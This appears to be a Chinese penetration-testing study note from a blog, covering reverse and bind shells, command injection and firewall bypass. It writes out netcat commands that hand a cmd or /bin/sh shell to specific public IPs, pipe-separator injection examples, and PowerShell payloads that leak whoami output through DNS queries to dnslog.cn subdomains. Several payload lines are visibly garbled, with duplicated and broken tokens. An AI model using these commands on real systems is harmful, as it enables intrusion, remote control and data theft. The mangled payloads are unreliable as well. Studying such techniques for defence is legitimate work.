五、反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

#常规基本渗透命令详解
https://blog.csdn.net/weixin_43303273/article/details/83029138

#实用案例1:文件上传下载-解决无图形化&解决数据传输
文件需传到网站目录
记得结束apache进程,会占用端口
提前用浏览器直接访问测试文件是否在目录中
命令生成:https://forum.ywhack.com/bountytips.php?download
Linux:wget curl python ruby perl java等
Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等

#实用案例2:反弹Shell命令-解决数据回显&解决数据通讯
Nc在Linux上自带,Windows上不自带。
能将对方权限直接传到自己的电脑
命令生成:https://forum.ywhack.com/shell.php
1、正向连接:本地监听等待对方连接
Linux控制Windows
//绑定CMD到本地5566端口
nc -e cmd -lvvp 5566
//主动连接目标5566
ncat 47.122.23.131 5566

Windows控制Linux
//绑定SH到本地5566端口
ncat -e /bin/sh -lvp 5566
//主动连接目标5566
nc 47.94.236.117 5566
(需要Linux和Windows在同一局域网)
2、反向连接:主动给出去,对方监听
//绑定SH到目标5566端口
ncat -e /bin/sh 47.122.23.131 5566(多了一个对方的IP地址)
//等待5566连接
nc -lvvp 5566

//绑定CMD到目标5566端口
nc -e cmd 47.94.236.117 5566(需要Linux有公网IP ,不然Linux与Windows需要在同一个局域网下
//等待5566连接
ncat -lvvp 5566

#实际案例1:防火墙绕过-正向连接&反向连接&内网服务器
1、Linux服务器上搭建Tomcat,注意端口是8080
2、注意tomcat的文件目录
3、利用宝塔搭建网站,在本机操作Windows服务器
4、宝塔会拦截函数、使用小皮时出现乱码,重新安装后成功
管道符:| (管道符号) ||(逻辑或) &&(逻辑与) &(后台任务符号)
Windows->| & || &&
Linux->; | || & && (特有和;)
例子:
ping -c 1 127.0.0.1 ; whoami
ping -c 1 127.0.0.1 | whoami
ping -c 1 127.0.0.1 || whoami
ping -c 1 127.0.0.1 & whoami
ping -c 1 127.0.0.1 && whoami
ping -c 1 127.0.0.1 whoami

1、判断windows
2、windows没有自带的nc
3、想办法上传nc 反弹权限
4、反弹
开启入站策略,采用反向连接
Linux:ncat -lvvp 5566
Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566
开启出站策略,采用正向连接
防火墙开启后入站规则更加严苛,只能使用默认通讯端口,除非添加规则
Linux:ncat -e cmd 47.122.23.131 5566
Windows:127.0.0.1 | nc -e cmd -lvvp 5566
正反向反弹案例-内网服务器
只能内网主动交出数据,反向连接

#实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog
1、dnslog.cn
2 、ping whoami.gcuaukgu.com
3\此方法只能在Linux服务器上使用,因为Windows服务器不支持此拼接方法
4、故使用powershell命令,将数据能够带
出站入站都开启策略(数据不回显):OSI网络七层
127.0.0.1 | powershell x = w h o a m i ; x=whoami; x=whoami;x= x . R e p l a c e ( ′ , ˊ ′ x x x ′ ) ; x.Replace('\','xxx'); x.Replace(,ˊxxx);y=‘.f4an93.dnslog.cn’; z = z= z=x+$y;ping $z

漏洞有,但是数据不回显:
1、反弹shell
2、带外查询

确定能执行命令
windows
ping命令可绕过防火墙,因为其走的都是icmp协议,防火墙过滤的是tcp和udp
;

ping 127.0.0.1 |

为什么要这样写
cmd无法执行whoami
用到powershell变量赋值 把whoami执行结果给变量
结果带有“\” 导致ping无法执行

powershell x = w h o a m i ; x=whoami; x=whoami;x= x . R e p l a c e ( ′ , ˊ ′ x x x ′ ) ; x.Replace('\','xxx'); x.Replace(,ˊxxx);y=‘.vpod5d.dnslog.cn’; z = z= z=x+$y;ping $z

127.0.0.1 | powershell x = v e r ; x=ver; x=ver;x= x . R e p l a c e ( ′ , ˊ ′ x x x ′ ) ; x.Replace('\','xxx'); x.Replace(,ˊxxx);y=‘.vpod5d.dnslog.cn’; z = z= z=x+$y;ping $z

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值